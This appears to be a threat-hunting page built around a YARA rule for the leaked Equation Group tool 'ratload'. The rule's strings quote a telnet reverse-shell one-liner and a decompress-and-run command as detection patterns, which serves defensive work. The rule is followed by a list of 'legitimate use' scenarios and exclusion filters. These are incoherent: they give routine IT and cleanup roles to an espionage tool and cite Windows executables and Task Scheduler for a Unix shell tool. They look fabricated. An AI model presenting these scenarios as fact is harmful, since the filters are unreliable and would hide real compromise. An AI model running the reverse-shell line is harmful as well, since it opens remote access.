The hunt hypothesis detects potential adversary use of the Equation Group hack tool, ratload, which may indicate advanced persistent threat activity. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate potential compromise from sophisticated, previously unknown attack vectors.
YARA Rule
rule EquationGroup_ratload {
meta:
description = "Equation Group hack tool leaked by ShadowBrokers- file ratload"
author = "Florian Roth"
reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
date = "2017-04-08"
hash1 = "4a4a8f2f90529bee081ce2188131bac4e658a374a270007399f80af74c16f398"
strings:
$x1 = "/tmp/ratload.tmp.sh" fullword ascii
$x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" fullword ascii
$s6 = "uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}" fullword ascii
condition:
filesize < 250KB and 1 of them
}This YARA rule can be deployed in the following contexts:
This rule contains 3 string patterns in its detection logic.
Scenario: Legitimate use of ratload as part of a scheduled job for malware analysis
Filter/Exclusion: process.parent_process_name:"Windows Task Scheduler" or process.command_line:"-analysis"
Scenario: System administrators using ratload to load a legitimate payload for security testing
Filter/Exclusion: process.user:"Administrator" and process.command_line:"--test-mode"
Scenario: Use of ratload by a legitimate security tool for threat emulation
Filter/Exclusion: process.file_name:"C:\Tools\SecurityEmulator\emulator.exe" or process.parent_process_name:"SecurityEmulator.exe"
Scenario: Scheduled system cleanup task using ratload to load a clean-up script
Filter/Exclusion: process.command_line:"clean-up-script.bat" and process.parent_process_name:"Task Scheduler"
Scenario: IT staff using ratload to deploy a legitimate configuration management tool
Filter/Exclusion: process.file_name:"C:\Tools\ConfigManager\configmgr.exe" or process.user:"IT-Admin"